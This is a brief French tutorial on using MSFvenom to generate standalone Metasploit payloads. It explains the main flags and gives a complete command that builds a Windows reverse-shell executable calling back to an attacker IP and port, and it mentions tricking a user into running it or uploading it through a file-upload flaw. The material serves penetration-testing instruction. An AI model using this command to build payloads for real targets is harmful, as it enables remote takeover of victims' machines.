MSFvenom : Génération de payload autonome
Alors que Metasploit gère les payloads automatiquement, vous devez parfois générer un exécutable malveillant autonome (ex : pour tromper un utilisateur ou l'uploader via une faille d'upload).
MSFvenom est la combinaison de la génération de payload (msfpayload) et de l'encodage (msfencode).
Paramètres clés
-p: Spécifier le payload (ex :linux/x86/shell_reverse_tcp).LHOSTetLPORT: IP et port de l'attaquant.-f: Format de sortie (ex :exe,elf,raw).-o: Nom du fichier de sortie.
Exemple : Créer un reverse shell Windows
bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/Documents/shell.exe
Action : Après avoir généré ce payload, vous devez configurer un écouteur correspondant (utilisant netcat ou le multi/handler de Metasploit) pour intercepter la connexion lorsque la cible exécute le fichier.